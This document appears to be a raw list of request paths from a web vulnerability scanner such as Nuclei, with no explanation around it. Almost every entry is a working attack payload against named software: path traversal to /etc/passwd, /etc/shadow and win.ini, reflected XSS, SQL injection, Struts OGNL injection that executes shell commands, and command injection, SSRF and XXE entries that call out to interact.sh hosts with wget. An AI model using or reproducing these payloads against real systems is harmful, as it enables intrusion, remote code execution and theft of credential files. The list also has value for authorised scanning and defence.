"/index.php?page=/etc/passwd%00",
"/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/poc.jsp/",
"/wp-admin/admin.php/%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E/?page=under-construction",
"/remote/login?&err=--%3E%3Cscript%3Ealert('2A6Shokysp4lCVeJOuISTfH7Azm')%3C/script%3E%3C!--&lang=en",
"/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress",
"/?id=nuclei%25%7B128*128%7D",
"/zabbix/index_sso.php",
"/XmlPeek.aspx?dt=%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5CWindows%5C%5Cwin.ini&x=/validate.ashx?requri",
"/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd",
"/jars/upload",
"/index.php?page_slug=../../../../../etc/passwd%00",
"/?q=node&destination=node",
"/img.php?f=/./etc/./passwd",
"/openam/ui/PWResetUserValidation",
"/base/static/c:/windows/win.ini",
"/ssi/printenv.shtml?%3Cscript%3Ealert('xss')%3C/script%3E",
"/index.php?rest_route=/whm/v3/themesettings",
"/uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://cadgqm02toabu64p21o0ckqdiseynfcy4.interact.sh)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything",
"/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00",
"/wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/wp-content/uploads/wp-file-manager-pro/fm_backup/",
"/s/2A6ShsMcDmQV0cd8gIXvtJEjHtx/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml",
"/actuator/gateway/refresh",
"/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00",
"/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd",
"/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/assets/app/something/services/AppModule.class/",
"/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00",
"/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg",
"/apisix/batch-requests",
"/hub/",
"/wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword=%22onmouseover%3Dalert(document.domain)%3B%2F%2F",
"/plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/phpmyadmin/",
"/example.com/%2F..",
"/cgi-bin/system_mgr.cgi?",
"/vendor/qcubed/qcubed/assets/php/profile.php",
"/services/pluginscript/",
"/include/findusers.php?token=%7B%7Btoken%7D%7D",
"/dashboard/uploadID.php",
"/printenv.shtml?%3Cscript%3Ealert('xss')%3C/script%3E",
"/admin/airflow/code?root=&dag_id=example_passing_params_via_test_command",
"/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc",
"/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data",
"/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1",
"/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php",
"/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING",
"/menu/guiw?nsbrand=1&protocol=nonexistent.1337%22%3E&id=3&nsvpx=phpinfo",
"/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00",
"/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/_bulk",
"/_async/AsyncResponseService",
"/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)",
"/wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/os/mxperson",
"/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://example.com",
"/pages/setup.php?defaultlanguage=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
"/%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://cadgqm02toabu64p21o0ckxb8gaygadxo.interact.sh%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://cadgqm02toabu64p21o0ckxb8gaygadxo.interact.sh%7D;?%7B%7Brepeat(%22A%22,",
"/KeepAlive.jsp?stamp=%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/artifactory/ui/auth/login?_spring_security_remember_me=false",
"/ui_base/js/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
"/pme/database/pme/phinx.yml",
"/public/login.htm?type=probes",
"/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00",
"/snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains",
"/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00",
"/cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd",
"/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00",
"/index.php?option=com_imagebrowser&folder=../../../../etc/passwd",
"/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1",
"/axis2-admin/login",
"/addons/phpmailer/phpmailer.php",
"/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2F%5Cexample.com",
"/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0Acat%20/etc/passwd%0A'&PW=",
"/%5C../ssl/yaws-key.pem",
"/wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option",
"/Side.php",
"/secure/ManageFilters.jspa?filter=popular&filterView=popular",
"/assets/_core/php/profile.php",
"/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd",
"/echo-server.html?code=test&state=http://www.attacker.com",
"/wp-content/plugins/quiz-master-next/README.md",
"/login.htm",
"/wp-json/wp/v2/lesson/1",
"/SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei",
"/query/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/all",
"/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00",
"/wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc",
"/?url=http://0177.0.0.1/server-status",
"/images/..%2Fcgi/cgi_i_filter.js?_tn=%7B%7Btrimprefix(base64_decode(httoken),",
"/include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt",
"/man.cgi?redirect=setting.htm%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY",
"/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22",
"/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00",
"/ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/lucee/admin/imgProcess.cfm?file=/../../../context/2A6Shtr4a9fcLliFOzxU3XTS91i.cfm",
"/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00",
"/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00",
"/variable/varimport",
"/meta",
"/index.php?option=com_contenthistory&view=history&list%5Bordering%5D=&item_id=1&type_id=1&list%5Bselect%5D=updatexml(0x23,concat(1,md5(8888)),1)",
"/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode'%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0",
"/pages/doenterpagevariables.action",
"/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ==",
"/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/osm/REGISTER.cmd",
"/functionRouter",
"/javax.faces.resource/dynamiccontent.properties.xhtml",
"/adserve/www/delivery/lg.php?dest=http://example.com",
"/cgi-bin/login.cgi",
"/?ajax-request=jnews",
"/checkValid",
"/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd",
"/api/snapshots",
"/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd",
"/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd",
"/cas/v1/tickets/",
"/wp-admin/admin-ajax.php?action=moove_read_xml",
"/wp-admin/admin.php?page=download_report&report=users&status=all",
"/visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&end=500&match",
"/password.jsn",
"/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C'%2Balert(1)%2C%2F%2F",
"/.../.../.../.../.../.../.../.../.../etc/passwd",
"/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd",
"/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/xmlpserver/ReportTemplateService.xls",
"/module/ph_simpleblog/list?sb_category=')%20OR%20true--%20-",
"/?action=command&command=set_city_timezone&value=$(wget%20http://cadgqm02toabu64p21o0cktfmzaytcqar.interact.sh))",
"/magmi/web/magmi_saveprofile.php",
"/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828",
"/wiki/pages/createpage-entervariables.action?SpaceKey=x",
"/te%3Cimg%20src=x%20onerror=alert(42)%3Est",
"/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php",
"/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd",
"/index.php?sl=../../../../../../../etc/passwd%00",
"/OpenAM-11.0.0/ui/PWResetUserValidation",
"/admin/queues.jsp?QueueFilter=yu1ey%22%3E%3Cscript%3Ealert(%221%22)%3C%2Fscript%3Eqb68",
"/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00",
"/2A6ShxmdxEvyNHeEmBGpxhGreW3?cmd=id",
"/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%22&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E",
"/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow",
"/signEzUI/playlist/edit/upload/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../etc/passwd",
"/wp-content/plugins/canto/includes/lib/get.php?subdomain=cadgqm02toabu64p21o0ckp95roybtiyn.interact.sh",
"/html/log",
"/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download",
"/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00",
"/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00",
"/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&msg=imported",
"/revive/www/delivery/lg.php?dest=http://example.com",
"/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://",
"/newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert(2A6ShuQYcR9ha3Ad7GGdkDAGP8O)%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY",
"/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd",
"/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00",
"/wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert(document.domain)%3E",
"/api/experimental/dags/example_trigger_target_dag/dag_runs/%7B%7Bexec_date%7D%7D/tasks/bash_task",
"/downloads/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd",
"/%252f%255cexample.com%252fa%253fb/",
"/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd",
"/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net",
"/.%0D./.%0D./.%0D./.%0D./bin/sh",
"/static?/%2557EB-INF/web.xml",
"/server/",
"/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://cadgqm02toabu64p21o0ckx1jhyyecrwa.interact.sh/",
"/..../..../..../..../..../..../..../..../..../windows/win.ini",
"/actions/authenticate.php",
"/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=..%2F..%2F..%2F../wp-config.php",
"/?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/external_content/retrieve/oembed?endpoint=http://cadgqm02toabu64p21o0ckqn3hayb97mn.interact.sh&url=foo",
"/search.php?search=%22;wget+http%3A%2F%2Fcadgqm02toabu64p21o0ckpt36yyyqube.interact.sh';%22",
"/cgi?2",
"/admin/index.php?p=ajax-ops&op=elfinder",
"/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st",
"/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1",
"/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E",
"/verify.php?id=1&confirm_hash=",
"/cgi?7",
"/solr/%7B%7Bcore%7D%7D/config",
"/analytics/telemetry/ph/api/hyper/send?_c&_i=test",
"/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files%5B%5D=/etc/passwd",
"/ajax/api/content_infraction/getIndexableContent",
"/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/lui/",
"/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00",
"/apply_sec.cgi",
"/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1",
"/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/_search",
"/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00",
"/wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx%3Cimg%20src=x%20onerror=alert(document.domain)%3E",
"/wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E",
"/new/newhttp://example.com",
"/Config/SaveUploadedHotspotLogoFile",
"/objects/nuclei.txt",
"/help/english/index.html?javascript&",
"/plugins/web/service/search/auto-completion/domain/en.xml?q=adm",
"/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C",
"/actions/seomatic/meta-container/meta-link-container/?uri=%7B%7B228*'98'%7D%7D",
"/appGet.cgi?hook=get_cfg_clientlist()",
"/ucmdb-api/connect",
"/api/geojson?url=file:///etc/passwd",
"/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152",
"/cgi-bin/supportInstaller",
"/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd",
"/en/php/usb_sync.php",
"/module/?module='onm%3Ca%3Eouseover=alert(document.domain)'%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url=https://ultimatebingoverifier.appspot.com",
"/_ignition/execute-solution",
"/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax",
"/tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2Fcadgqm02toabu64p21o0ckoky6yym98cc.interact.sh%60",
"/wp-admin/admin.php?page=mlw_quiz_list&s=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&paged=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C",
"/admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=2A6Shpy69LRE7nGc296RISOqyiR.php&target=l1_Lw",
"/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo",
"/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com",
"/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00",
"/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00",
"/calendar_form.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/test.php",
"/download/index.php?file=../../../../../../../../../etc/passwd",
"/aj.html?a=devi",
"/cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq';%7D%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00",
"/login.action?redirectAction:$%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B'sh','-c','id'%7D)).start(),%23b%3D%23a.getInputStream(),%23c%3Dnew%20java.io.InputStreamReader(%23b),%23d%3Dnew%20java.io.BufferedReader(%23c),%23e%3Dnew%20char%5B50000%5D,%23d.read(%23e),%23matt%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D",
"/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/?p=1",
"/?file=http://0177.0.0.1/etc/passwd",
"/api/users/search_authors",
"/tools/sourceViewer/index.html?filename=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
"/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00",
"/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Ca+href=%22/*%22%3E*/)%7D);function+__MobileAppList()%7Balert(1)%7D//%3E",
"/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/",
"/?location=search",
"/pages/createpage-entervariables.action",
"/$%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue,%23a%3D@java.lang.Runtime@getRuntime().exec('cat%20/etc/passwd').getInputStream(),%23b%3Dnew%20java.io.InputStreamReader(%23a),%23c%3Dnew%20%20java.io.BufferedReader(%23b),%23d%3Dnew%20char%5B51020%5D,%23c.read(%23d),%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23sbtest.println(%23d),%23sbtest.close())%7D/actionChain1.action",
"/__",
"/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E",
"/debug/pprof/",
"/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm",
"/objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png",
"/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00",
"/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd",
"/embed.js",
"/cache/backup/",
"/product-downloads/2A6Shpy69LRE7nGc296RISOqyiR.php",
"/graph_realtime.php?action=init",
"/assets/data/usrimg/2a6shrldmmlw2sccgtt4aznqm68.php",
"/viewlog.jsp",
"/action.php",
"/webadmin/pkg?command=%3Cscript%3Ealert(document.cookie)%3C/script%3E",
"/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd",
"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license",
"/wp-admin/admin.php?page=wow-company&tab=http://cadgqm02toabu64p21o0ckq993oygttpc.interact.sh/",
"/solr/%7B%7Bcore%7D%7D/replication/?command=fetchindex&masterUrl=https://example.com",
"/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd",
"/index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D",
"/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd",
"/fw.progrss.details.php?popup=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
"/s/2A6Shr1P7pElwh4RumRAZq6rOlW/_/;/WEB-INF/web.xml",
"/cgi-bin/;cat$IFS/etc/passwd",
"/api/experimental/dags/example_trigger_target_dag/paused/false",
"/cgi-bin/slogin/login.py",
"/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::",
"/lab.html?vpath=//example.com",
"/mantisBT/verify.php?id=1&confirm_hash=",
"/oam/server/opensso/sessionservice",
"/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://example.com",
"/adserver/www/delivery/lg.php?dest=http://example.com",
"/index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D",
"/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com",
"/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1",
"/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&what=x&where=BODY&submit=Search",
"/mgmt/shared/authn/login",
"/api.php",
"/cgi-bin/logoff.cgi",
"/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1",
"/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename'%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
"/owa/auth/x.js",
"/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/goform/setmac",
"/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1%22%20onmouseover=alert(document.domain)//",
"/+CSCOE+/session_password.html",
"/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData",
"/?key='%3E%22%3Csvg%2Fonload=confirm('xss')%3E",
"/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users",
"/solr/%7B%7Bcore%7D%7D/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2Fcadgqm02toabu64p21o0ckqiumyyfogtn.interact.sh%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser",
"/wp-content/plugins/w3-total-cache/pub/sns.php",
"/jolokia/read%3Csvg%20onload=alert(document.domain)%3E?mimeType=text/html",
"/plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
